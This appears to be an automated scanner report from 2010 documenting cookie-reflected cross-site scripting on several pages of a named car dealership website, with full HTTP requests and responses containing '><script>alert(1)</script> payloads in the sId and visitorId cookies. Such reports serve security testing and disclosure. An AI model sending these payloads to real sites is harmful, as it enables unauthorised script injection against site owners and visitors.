Host: www.sunnyvalevw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdwf65fc'><script>alert(1)</script>15a86c66cff; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw;
Response
HTTP/1.0 200 OK
Cache-Control: no-store,no-cache="Set-Cookie"
Date: Wed, 08 Dec 2010 07:44:19 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=nKLjM13T6ycGJR8JhqttXLGjDtTyfQ42sNcv5n6LVkylSl1khNHk!-1618160423; path=/
Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdwf65fc'><script>alert(1)</script>15a86c66cff; expires=Friday, 07-Dec-2012 07:44:19 GMT
Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Wednesday, 08-Dec-2010 08:14:19 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
X-Cache: MISS from backend01-1
X-Cache-Lookup: MISS from backend01-1:4001
X-Cache: MISS from frontend01
X-Cache-Lookup: MISS from frontend01:3128
Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid)
Proxy-Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the sId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 67033'><script>alert(1)</script>694fe16996f was submitted in the sId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ContactUsForm HTTP/1.1
Host: www.sunnyvalevw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw67033'><script>alert(1)</script>694fe16996f;
Response
HTTP/1.0 200 OK
Cache-Control: no-store,no-cache="Set-Cookie"
Date: Wed, 08 Dec 2010 07:44:42 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=S4nmM13Ky0wYR9HyC9Wp6r1CQKtpMMbHQKN2jmnykTlZDJFRgTXS!-1618160423; path=/
Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Friday, 07-Dec-2012 07:44:42 GMT
Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw67033'><script>alert(1)</script>694fe16996f; expires=Wednesday, 08-Dec-2010 08:14:42 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
X-Cache: MISS from backend01-1
X-Cache-Lookup: MISS from backend01-1:4001
X-Cache: MISS from frontend01
X-Cache-Lookup: MISS from frontend01:3128
Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid)
Proxy-Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the visitorId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ac93a'><script>alert(1)</script>d45b351a197 was submitted in the visitorId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ContactUsForm HTTP/1.1
Host: www.sunnyvalevw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdwac93a'><script>alert(1)</script>d45b351a197; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw;
Response
HTTP/1.0 200 OK
Cache-Control: no-store,no-cache="Set-Cookie"
Date: Wed, 08 Dec 2010 07:44:23 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=nGMVM13XLfQyH1X3sZ1lrNbBgk1tlcJP4G4Z7qbycfMJQWPn3ThR!-1618160423; path=/
Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdwac93a'><script>alert(1)</script>d45b351a197; expires=Friday, 07-Dec-2012 07:44:23 GMT
Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Wednesday, 08-Dec-2010 08:14:23 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
X-Cache: MISS from backend01-1
X-Cache-Lookup: MISS from backend01-1:4001
X-Cache: MISS from frontend01
X-Cache-Lookup: MISS from frontend01:3128
Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid)
Proxy-Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the sId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eae50'><script>alert(1)</script>7408415414f was submitted in the sId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /HomePage HTTP/1.1
Host: www.sunnyvalevw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdweae50'><script>alert(1)</script>7408415414f;
Response
HTTP/1.0 200 OK
Cache-Control: no-store,no-cache="Set-Cookie"
Date: Wed, 08 Dec 2010 07:44:46 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=TNtJM13TRzqL0R0TlxhjLVH8nxwhff4ZGXWnW0XnNGZDQLX9p9mW!-1618160423; path=/
Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Friday, 07-Dec-2012 07:44:46 GMT
Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdweae50'><script>alert(1)</script>7408415414f; expires=Wednesday, 08-Dec-2010 08:14:46 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
X-Cache: MISS from backend01-1
X-Cache-Lookup: MISS from backend01-1:4001
X-Cache: MISS from frontend01
X-Cache-Lookup: MISS from frontend01:3128
Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid)
Proxy-Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the visitorId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 47add'><script>alert(1)</script>3a0afa4204 was submitted in the visitorId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /HomePage HTTP/1.1
Host: www.sunnyvalevw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw47add'><script>alert(1)</script>3a0afa4204; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw;
Response
HTTP/1.0 200 OK
Cache-Control: no-store,no-cache="Set-Cookie"
Date: Wed, 08 Dec 2010 07:44:20 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=YnJJM13JLK9YL1w2mJvTgq5XpJvQMprxwHxSVc2D0YqVhQs16q0F!-1618160423; path=/
Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw47add'><script>alert(1)</script>3a0afa4204; expires=Friday, 07-Dec-2012 07:44:20 GMT
Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Wednesday, 08-Dec-2010 08:14:20 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
X-Cache: MISS from backend01-1
X-Cache-Lookup: MISS from backend01-1:4001
X-Cache: MISS from frontend01
X-Cache-Lookup: MISS from frontend01:3128
Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid)
Proxy-Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the sId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 98a30'><script>alert(1)</script>3924410583b was submitted in the sId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /HoursAndDirections HTTP/1.1
Host: www.sunnyvalevw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw98a30'><script>alert(1)</script>3924410583b;
Response
HTTP/1.0 200 OK
Cache-Control: no-store,no-cache="Set-Cookie"
Date: Wed, 08 Dec 2010 07:44:36 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=jJ8JM13Gj0lmfG1Hhcht7Pmhfpr7094FLvcmKbt9FGQKR1JHQTPq!-1618160423; path=/
Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Friday, 07-Dec-2012 07:44:36 GMT
Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw98a30'><script>alert(1)</script>3924410583b; expires=Wednesday, 08-Dec-2010 08:14:36 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
X-Cache: MISS from backend01-1
X-Cache-Lookup: MISS from backend01-1:4001
X-Cache: MISS from frontend01
X-Cache-Lookup: MISS from frontend01:3128
Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid)
Proxy-Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the visitorId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 78531'><script>alert(1)</script>3b4e7e6b4ad was submitted in the visitorId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /HoursAndDirections HTTP/1.1
Host: www.sunnyvalevw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw78531'><script>alert(1)</script>3b4e7e6b4ad; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw;
Response
HTTP/1.0 200 OK
Cache-Control: no-store,no-cache="Set-Cookie"
Date: Wed, 08 Dec 2010 07:44:18 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=7Jv8M13S91YWJvtxC2HWKlpXGnQWGv1PVkpg0Rr2728rL9pvsb40!-1618160423; path=/
Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw78531'><script>alert(1)</script>3b4e7e6b4ad; expires=Friday, 07-Dec-2012 07:44:18 GMT
Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Wednesday, 08-Dec-2010 08:14:18 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
X-Cache: MISS from backend01-1
X-Cache-Lookup: MISS from backend01-1:4001
X-Cache: MISS from frontend01
X-Cache-Lookup: MISS from frontend01:3128
Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid)
Proxy-Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the sId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6d717'><script>alert(1)</script>eb92d5c6ce9 was submitted in the sId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /PrivacyPolicy HTTP/1.1
Host: www.sunnyvalevw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw6d717'><script>alert(1)</script>eb92d5c6ce9;
Response
HTTP/1.0 200 OK
Cache-Control: no-store,no-cache="Set-Cookie"
Date: Wed, 08 Dec 2010 07:44:49 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=JwGpM13R2W7w0y1JV74QMLThZ7g1hGbHh0WqhCqLKWgL1dDmlHL3!-1618160423; path=/
Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Friday, 07-Dec-2012 07:44:49 GMT
Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw6d717'><script>alert(1)</script>eb92d5c6ce9; expires=Wednesday, 08-Dec-2010 08:14:49 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
X-Cache: MISS from backend01-1
X-Cache-Lookup: MISS from backend01-1:4001
X-Cache: MISS from frontend01
X-Cache-Lookup: MISS from frontend01:3128
Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid)
Proxy-Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the visitorId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 953fd'><script>alert(1)</script>88ee0dc1f30 was submitted in the visitorId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /PrivacyPolicy HTTP/1.1
Host: www.sunnyvalevw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw953fd'><script>alert(1)</script>88ee0dc1f30; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw;
Response
HTTP/1.0 200 OK
Cache-Control: no-store,no-cache="Set-Cookie"
Date: Wed, 08 Dec 2010 07:44:31 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=pkRSM13fmnSLG9yYYWwlB1CmGMwyqWnTb9bQhJrJv5HTtQnZqwvF!-1618160423; path=/
Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw953fd'><script>alert(1)</script>88ee0dc1f30; expires=Friday, 07-Dec-2012 07:44:31 GMT
Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Wednesday, 08-Dec-2010 08:14:31 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
X-Cache: MISS from backend01-1
X-Cache-Lookup: MISS from backend01-1:4001
X-Cache: MISS from frontend01
X-Cache-Lookup: MISS from frontend01:3128
Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid)
Proxy-Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the sId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dab82'><script>alert(1)</script>709f9704f39 was submitted in the sId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ServiceEvent_D HTTP/1.1
Host: www.sunnyvalevw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdwdab82'><script>alert(1)</script>709f9704f39;
Response
HTTP/1.0 200 OK
Cache-Control: no-store,no-cache="Set-Cookie"
Date: Wed, 08 Dec 2010 07:44:51 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=7RGNM13Tt1h3fG0qg8FLyn627vFRH85pQn9p7l5TxhXptjg01JJw!-1618160423; path=/
Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Friday, 07-Dec-2012 07:44:51 GMT
Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdwdab82'><script>alert(1)</script>709f9704f39; expires=Wednesday, 08-Dec-2010 08:14:51 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
X-Cache: MISS from backend01-1
X-Cache-Lookup: MISS from backend01-1:4001
X-Cache: MISS from frontend01
X-Cache-Lookup: MISS from frontend01:3128
Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid)
Proxy-Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the visitorId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3089'><script>alert(1)</script>9fc8afd855e was submitted in the visitorId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ServiceEvent_D HTTP/1.1
Host: www.sunnyvalevw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdwf3089'><script>alert(1)</script>9fc8afd855e; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw;
Response
HTTP/1.0 200 OK
Cache-Control: no-store,no-cache="Set-Cookie"
Date: Wed, 08 Dec 2010 07:44:33 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=WH2FM13B2vBPqpSZpzGjQ1y1mBycj5MW0nLqLVhSZ1m2s1syvp7w!-1618160423; path=/
Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdwf3089'><script>alert(1)</script>9fc8afd855e; expires=Friday, 07-Dec-2012 07:44:33 GMT
Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Wednesday, 08-Dec-2010 08:14:33 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
X-Cache: MISS from backend01-1
X-Cache-Lookup: MISS from backend01-1:4001
X-Cache: MISS from frontend01
X-Cache-Lookup: MISS from frontend01:3128
Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid)
Proxy-Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the sId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 276b4'><script>alert(1)</script>322ead584dd was submitted in the sId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /siteMap HTTP/1.1
Host: www.sunnyvalevw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw276b4'><script>alert(1)</script>322ead584dd;
Response
HTTP/1.0 200 OK
Cache-Control: no-store,no-cache="Set-Cookie"
Date: Wed, 08 Dec 2010 07:44:40 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=CG8LM13Lt0y2JyGrlHxLWq59vm2jRyyBBlycxgp2TdLcztYp2rnk!-1618160423; path=/
Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Friday, 07-Dec-2012 07:44:40 GMT
Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw276b4'><script>alert(1)</script>322ead584dd; expires=Wednesday, 08-Dec-2010 08:14:40 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
X-Cache: MISS from backend01-1
X-Cache-Lookup: MISS from backend01-1:4001
X-Cache: MISS from frontend01
X-Cache-Lookup: MISS from frontend01:3128
Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid)
Proxy-Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the visitorId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 51225'><script>alert(1)</script>4c69b6fe928 was submitted in the visitorId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /siteMap HTTP/1.1
Host: www.sunnyvalevw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw51225'><script>alert(1)</script>4c69b6fe928; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw;
Response
HTTP/1.0 200 OK
Cache-Control: no-store,no-cache="Set-Cookie"
Date: Wed, 08 Dec 2010 07:44:21 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=fy7kM13V9rMBpF6CvdkJHDv0cXCV6vGKkSDPTp7K8FwKfJ5mPy7W!-1618160423; path=/
Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw51225'><script>alert(1)</script>4c69b6fe928; expires=Friday, 07-Dec-2012 07:44:21 GMT
Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Wednesday, 08-Dec-2010 08:14:21 GMT
Content-Language: en-US
